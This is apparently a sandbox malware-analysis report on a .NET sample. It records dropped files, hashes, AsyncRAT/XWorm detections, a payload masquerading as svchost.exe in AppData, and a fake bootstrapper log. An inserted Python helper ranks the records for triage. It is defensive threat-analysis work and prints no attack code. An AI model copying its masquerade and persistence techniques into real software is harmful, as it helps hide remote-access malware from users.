Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):6872
Entropy (8bit):3.723371954899362
Encrypted:false
SSDEEP:96:RSIU6o7wVetbSsD1L416bYZW7/8hDw5aM4UW89bPTWDwtfbP9Lm:R6l7wVeJRDp412YZ48GprW89bbWcfDJm
MD5:EEA2DB3F3C45F84850A8A8CA3510ABD6
SHA1:21B1A1E4DCB2F38D0507E2DE9C21F5F610E308E3
SHA-256:FB320A5E229E42FFB3416E95D747EE5864223EE4EF62988BE038BBBBA95CAABB
SHA-512:46BC1133DA551188C94AE6376573E98F258BE5B88A4699F3847694F12F4C1D5F4E44EC0CD62F2DED84ECCB205232A7C11BFA8E2AF99AC458229B6E2D18F0797D
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>7424</Pi
Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4901
Entropy (8bit):4.505549244466469
Encrypted:false
SSDEEP:48:cvIwWl8zsZDMtJg771I9XNbeWpW8VY6Ym8M4JQRjdeRC/F3yq8vaRChdRjdtbRjP:uIjfYI7mr7VeJyWHjtld
MD5:6B7C6F2B545C94EDBE32A1AF574E0D74
SHA1:4AAC1C17E77C462777A4BDD1DFFA06A0A3FA0D4B
SHA-256:B816BA609D17C808355FC4CECC64BF9887E02A2AA833A9F4948077A66A6C6D78
SHA-512:6762CCA9A2649B70AAC292358695446D6EF952AD103F73932BA2E6C606F30EAF59D835DE1187AA06845D3299EECE1ECC9BC063A11DB3A263E8B3D0A255515427
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="612610" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):77578
Entropy (8bit):3.059647567802414
Encrypted:false
SSDEEP:1536:DTbeWWk5ZkgEifBUXGgLqJTCEsz97UpKzRKTKcqF7pU:DTbeWWk5ZkgEifBUXGgLqJTCEszZUpK8
MD5:B2B3C557D84904A2E3F0544E8AE391F5
SHA1:1D258CD49B7865C6B4392C4DC56DEE8AB3DA9160
SHA-256:387967CD25A3DA28919569C1C211F6A06641678DF4155FB993F2742FA4AC175E
SHA-512:BE4067CBEEA01E7C17F428AB58F5BACC7F7D28337A27916ACB3E9F054CEF21B79DAF337A732AA756DEF8F7A78D07693DC0BE83602E68D54ECD97320FC121DEB7
Malicious:false
Preview:ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):13340
Entropy (8bit):2.685020618207537
Encrypted:false
SSDEEP:96:TiZYWEoRoI8AY8Y9WhHYYEZ9BtFi1E1new85QSa+o3MS9tIY+3:2ZDEAb2Sha+o3MS9yY+3
MD5:076A1EEBDCC93DF4D0D2E8E892C2CE2D
SHA1:F5D53BC6663492BE5E8757C1FBF489322ADFA9C6
SHA-256:D37964F4936D6376DD32ABCC3C64D0E6A4BBC95AF935283DF200ECBE20094B42
SHA-512:D72774CA64A393122D22343529000D69C81949B4C3A01DCA1120DCBC3AE951C235DE6A6F73B9DE525A205549A7AE1CE49BF56A17A6CD33438A7EC2488730AB5F
Malicious:false
Process:C:\Users\user\Desktop\sDKRz09zM7.exe
File Type:CSV text
Category:dropped
Size (bytes):654
Entropy (8bit):5.380476433908377
Encrypted:false
SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:true
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):654
                                                                                                                                                                                                                                            Entropy (8bit):5.380476433908377
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                                                                            MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                                                                            SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                                                                            SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                                                                            SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Preview:@...e...........................................................
Process:C:\Users\user\AppData\Roaming\not rat.exe
File Type:Generic INItialization configuration [WIN]
Category:dropped
Size (bytes):64
Entropy (8bit):3.6722687970803873
Encrypted:false
SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
MD5:DE63D53293EBACE29F3F54832D739D40
SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
Malicious:false
Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
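An added triage helper for the dropped-file records above (example code, not part of the Joe Sandbox report or its tooling). It parses the flat key:value dump, groups records by SHA-256 so the repeated PowerShell entries collapse into one finding, sets aside the file whose content is "# PowerShell test file to determine AppLocker lockdown mode" (PowerShell writes that probe file itself on startup; it is a PowerShell artifact, not something the sample authored), and ranks first any file written by a process outside the Windows and Program Files trees, which here is the INI written by C:\Users\user\AppData\Roaming\not rat.exe. The system-path prefix list, the verdict labels and the ordering are this example's own assumptions; the sample records are copied from the report, trimmed to the fields the script uses.

```python
"""Parse and triage Joe Sandbox dropped-file records (added example)."""
from collections import defaultdict

# Content PowerShell writes to %TEMP%\__PSScriptPolicyTest_*.ps1 at startup
# to test AppLocker lockdown; match on content because the name is random.
PS_POLICY_PROBE = "# PowerShell test file to determine AppLocker lockdown mode"

# Assumption for this example: writers under these trees are OS/product
# binaries; anything else (user-profile paths etc.) is ranked first.
SYSTEM_PREFIXES = ("c:\\windows\\", "c:\\program files\\",
                   "c:\\program files (x86)\\")

# Four records copied from the report (probe record twice, as listed there),
# trimmed to the fields used below.
SAMPLE = r"""
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):64
Entropy (8bit):0.34726597513537405
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
Malicious:false
Preview:@...e...........................................................
Process:C:\Users\user\AppData\Roaming\not rat.exe
File Type:Generic INItialization configuration [WIN]
Category:dropped
Size (bytes):64
Entropy (8bit):3.6722687970803873
SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
Malicious:false
Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
"""


def parse_records(text):
    """Split the flat key:value dump into one dict per record."""
    records, cur = [], {}
    for raw in text.splitlines():
        # Only the first ':' separates key from value; paths and previews
        # contain further colons that must stay in the value.
        key, sep, value = raw.strip().partition(":")
        if not sep:
            continue                      # blank or non key:value line
        if key == "Process" and cur:      # "Process:" opens a new record
            records.append(cur)
            cur = {}
        cur[key] = value
    if cur:
        records.append(cur)
    return records


def triage(records):
    """Collapse records by SHA-256 and assign one verdict per unique file."""
    by_hash = defaultdict(list)
    for rec in records:
        by_hash[rec["SHA-256"]].append(rec)
    findings = []
    for sha256, group in by_hash.items():
        rec = group[0]
        if rec.get("Preview", "").startswith(PS_POLICY_PROBE):
            verdict = "benign-powershell-probe"
        elif not rec["Process"].lower().startswith(SYSTEM_PREFIXES):
            verdict = "review-nonsystem-writer"
        else:
            verdict = "review"
        findings.append({
            "sha256": sha256,
            "count": len(group),          # how many records shared this hash
            "process": rec["Process"],
            "file_type": rec.get("File Type", ""),
            "size": int(rec["Size (bytes)"]),
            "entropy": float(rec["Entropy (8bit)"]),
            "verdict": verdict,
        })
    order = {"review-nonsystem-writer": 0, "review": 1, "benign-powershell-probe": 2}
    findings.sort(key=lambda f: order[f["verdict"]])   # most interesting first
    return findings


if __name__ == "__main__":
    for f in triage(parse_records(SAMPLE)):
        print(f"{f['verdict']:<24} x{f['count']} {f['size']:>4}B "
              f"H={f['entropy']:.2f} {f['process']}")
```

Run against the full dropped-files table, the script reduces the seven identical PowerShell probe records to a single benign line and leaves the analyst with the two files actually worth opening: the low-entropy 64-byte "modified" file and the INI written from the user's roaming profile.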
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Users\user\Desktop\sDKRz09zM7.exe
File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):730112
Entropy (8bit):5.787095893687158
Encrypted:false
SSDEEP:6144:yDZdCcCJIN7OJFnLQiVnnNWzqG2k9BQZyxVfNxE3GpspjYuVTKXvLLFVH11US9IL:iJ7mFMixnNWSOI56LFp1iTq2BpjWK
MD5:EDBE7F367BE35F4D0702F81FC432C9EC
SHA1:AC4AD252CC5834F603479D7DD0D7E4E929E7C5B3
SHA-256:6F072A142FFA38B89792FB8D8C12520F5EA37EFFFC71EFA3478BBAE7C2CAF366
SHA-512:2D369FD1EE36692D870C865FE225FAECD282014F3687DFD8E52ECD579ABA038C7DDE7B3C973AD17526CF263770AB0579AC4AEBBE89E743BEC3180F6E132CFEBA
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 75%

Process:C:\Users\user\AppData\Roaming\not rat.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Dec 1 18:09:12 2024, mtime=Sun Dec 1 18:09:12 2024, atime=Sun Dec 1 18:09:12 2024, length=42496, window=hide
Category:dropped
Size (bytes):765
Entropy (8bit):5.071282059594917
Encrypted:false
SSDEEP:12:8nuuG24G4kChRY//9alL4xjAgHkR8d8zmV:8nuuoGBhsMA7RgIm
MD5:ABB3DDF6685E9EBCF08BB4FC767C583F
SHA1:9DBC85920CD4BD3BFFAFDE98ECB9636C35490DDF
SHA-256:F476C5F639724481B4FD573A52E76E599E28E51E84924E32414636BE3CF87551
SHA-512:1BB426E1310F4778FD93B159657D2230FD19165416B8C886ED69AA7642F22FAF0C0B5D4C81C7912FD0D118E8B5D3F5400529FDFE13AB6A0343110402498E0CD9
Malicious:false

Process:C:\Users\user\Desktop\sDKRz09zM7.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):42496
Entropy (8bit):5.546283806626274
Encrypted:false
SSDEEP:768:BmrJDweBDuOkScrbsN/x6WECAr43M4fJF5Pa9p+/fza6iOwhl3/mb2:B0DwewicrbsN/YDRrcRF49Im6iOwr+y
MD5:270675071F6FA1DFAA122B58BC45D9AB
SHA1:4A367BFA1DEB66D390FE249AA2BC979BC957619F
SHA-256:51184955D5AB79AB4D7EFA46F1618E16B8E1FF90030EF7B6EF81A0E89CD6138A
SHA-512:0C5B76B3B17D4881F97908D99ABEE07954A7BC97C7E85AB16AB2218535BFC27FAE45A2B20270B384FA29033341D5A6B38F0F1955ADA579DDE46EE2B649D98016
Malicious:true
Yara Hits:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 92%

Process:C:\Users\user\AppData\Roaming\not rat.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):42496
Entropy (8bit):5.546283806626274
Encrypted:false
SSDEEP:768:BmrJDweBDuOkScrbsN/x6WECAr43M4fJF5Pa9p+/fza6iOwhl3/mb2:B0DwewicrbsN/YDRrcRF49Im6iOwr+y
MD5:270675071F6FA1DFAA122B58BC45D9AB
SHA1:4A367BFA1DEB66D390FE249AA2BC979BC957619F
SHA-256:51184955D5AB79AB4D7EFA46F1618E16B8E1FF90030EF7B6EF81A0E89CD6138A
SHA-512:0C5B76B3B17D4881F97908D99ABEE07954A7BC97C7E85AB16AB2218535BFC27FAE45A2B20270B384FA29033341D5A6B38F0F1955ADA579DDE46EE2B649D98016
Malicious:true
Yara Hits:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 92%

Process:C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe
File Type:JSON data
Category:dropped
Size (bytes):103
Entropy (8bit):4.081427527984575
Encrypted:false
SSDEEP:3:XSWHlkHFWKBgdvHvIhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0aivQLkWFfx/52uyPm
MD5:B016DAFCA051F817C6BA098C096CB450
SHA1:4CC74827C4B2ED534613C7764E6121CEB041B459
SHA-256:B03C8C2D2429E9DBC7920113DEDF6FC09095AB39421EE0CC8819AD412E5D67B9
SHA-512:D69663E1E81EC33654B87F2DFADDD5383681C8EBF029A559B201D65EB12FA2989FA66C25FA98D58066EAB7B897F0EEF6B7A68FA1A9558482A17DFED7B6076ACA
Malicious:false
Preview:{. "args" : {. "code" : "8PgspRYAQu". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }

Process:C:\Windows\System32\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.372499919926089
Encrypted:false
SSDEEP:6144:/FVfpi6ceLP/9skLmb0OyWWSPtaJG8nAge35OlMMhA2AX4WABlguNFiL:tV1oyWWI/glMM6kF7Xq
MD5:457886ED5000E6D4A64CD8F2FFE46379
SHA1:CAA0061F604A65D7E0B209B6A912A4BDD8400E10
SHA-256:E4E36D6CA3EB3B631B75188E9986E8658DF74EBA6136B3E323AA001B860AB3BC
SHA-512:A6E6B403C136136F0C6993F9223A9A617873124EFA1CF685DC1D77FE030F0BEC00FB34B0639AA920DBA1D210E05931C71B72A105347405288D1B6384FFF433BC
Malicious:false
Process: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe
File Type: ISO-8859 text, with CRLF, LF line terminators
Category: dropped
Size (bytes): 571
Entropy (8bit): 4.9398118662542965
Encrypted: false
SSDEEP: 12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe
MD5: 5294778E41EE83E1F1E78B56466AD690
SHA1: 348B8B4687216D57B8DF59BBCEC481DC9D1E61A6
SHA-256: 3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C
SHA-512: 381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1
Malicious: true
Yara Hits:
• Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
Preview: .............................................................------------------------.. ..[-] Fetching endpoint.....[-] Bootstrapper up to date...[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.996204060174564
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: sDKRz09zM7.exe
File size: 782'848 bytes
MD5: 6c06275582db133a429e4149c0f1ac21
SHA1: 44c91c923711ed57cafbdd235fb4d1eac8a02a57
SHA256: 51edcfc381c90d4b6408aa58f991b14d7d7d57a3597550ecc63c663ebfd095d2
SHA512: 73bcca36ab0f6346dfb4020a0cc0fba2c907831f474cef3aeee30c57683bdaecff869d06c35d09b104d0db6df5dd513e19d724135d27fac7ecc524cd3ece7ac4
SSDEEP: 12288:YQRNZLQX+3D5f1rH38kqColunF5mCwvUtGyemkLp1FkZ7ptNUyg5C:vLzD5fx38kuluFQC8UYyHC6BrKyg
TLSH: 44F4232F63936589F3EC78B12C14CA3F5B57035C567F5E1E4A9668C6BAC0A728722D30
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Jg................................. ... ....@.. .......................`............@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x4c06fe
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x674ADACC [Sat Nov 30 09:28:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
